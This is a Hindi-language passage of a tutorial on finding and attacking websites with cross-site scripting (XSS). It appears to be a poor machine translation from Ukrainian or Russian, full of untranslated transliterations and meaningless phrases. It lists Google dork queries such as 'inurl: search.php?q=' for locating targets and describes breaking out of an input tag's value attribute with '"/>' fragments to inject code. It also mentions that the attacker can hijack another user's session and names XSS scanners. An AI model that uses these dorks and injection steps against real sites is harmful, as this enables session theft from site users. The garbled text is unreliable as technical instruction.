- मेलोरी अब अलीसा का सत्र संभाल सकती है और खुद को अलीसा के लिए देख सकती है।
razlivikh में XSS तक साइटों को पुश करें
एक्सएसएस सड़कें
पहला क्रोकस साइट्स को वाइब्रेट करना है, जिस पर हम XSS अटैक्स का इस्तेमाल कर पाएंगे। डोरकेन गूगल की मदद के पीछे साइट शुकती हो सकती है। श्रृंखला की धुरी ऐसे डॉर्केंस से है, जैसा कि आप इसे Google पर कॉपी करते हैं:
- इनयूआरएल: search.php? क्यू =
- इनयूआरएल: .php? क्यू =
- इनयूआरएल: search.php
- इनयूआरएल: .php? खोज =
हमारे सामने साइटों की एक सूची है। साइट को खोलना और इनपुट फ़ील्ड को जानना आवश्यक है, जैसे कि फॉर्म घंटी बजती है, परिचय का रूप, साइट पर पोस्टिंग आदि।
तुरंत मैं इस बात का सम्मान करूंगा कि लोकप्रिय स्वचालित रूप से नए वेब सबमिशन में यह व्यावहारिक रूप से मार्नो शुकाती अत्यावश्यक है। ऐसे ऐड-ऑन का क्लासिक बट वर्डप्रेस है। वर्डप्रेस में तात्कालिकता के लिए, और विशेष रूप से प्लगइन्स में, . इसके अलावा, कोई आलसी साइट नहीं हैं, लेकिन वे किसी भी वर्डप्रेस इंजन को एकीकृत नहीं करते हैं (वेबमास्टर अपने स्वयं के परिवर्तनों के रूप में कोब कोड तक लाता है), या प्लगइन्स और वे (एक नियम के रूप में, समान प्लगइन्स का उपयोग किया जाता है) . अले अगर आप बहुत कुछ पढ़ते हैं और नई चीजें जानते हैं, तो इसका मतलब है कि वर्डप्रेस आपके लिए नहीं है ...
Nykrashchі meti - लागत-कुशल स्व-लेखन इंजन और स्क्रिप्ट।
सम्मिलन के लिए याक कोरिसनोगो नवंतझेन्या को कंपन किया जा सकता है
अपने सम्मान को समाप्त करें, उसी HTML टैग में आप HTML कोड में अपने कोड का उपयोग करते हैं। परिचय के मानक क्षेत्र के बट की धुरी ( इनपुट):
हमारा है नवतंजनेया को तुडी को लिप्त करने के लिए, एक बार "तकिया" शब्द। Tobto टैग मान को फिर से प्रोग्राम करना इनपुट... एमआई मोगो त्सिओगो उनिकनुति - ज़ाकिमो स्लाइडर पैर, और फिर टैग ही मदद के लिए है "/>
"/>
आइए इसे वेबसाइट के लिए आजमाएं:
Vіdmіnno, विचरण
XSS अत्यावश्यकता के मजाक और स्कैन के लिए कार्यक्रम
मधुरता से, सभी वेब-आधारित स्कैनर्स को XSS ट्रिक स्कैनर से स्कैन किया जा सकता है। विषय शामिल नहीं है, त्वचा पॉडब्निम ओकेरेमो स्कैनर के साथ जानना अधिक सुंदर है।
Є XSS Ease पर स्कैनिंग के लिए विशेष टूल भी। उनमें से विशेष रूप से देखा जा सकता है।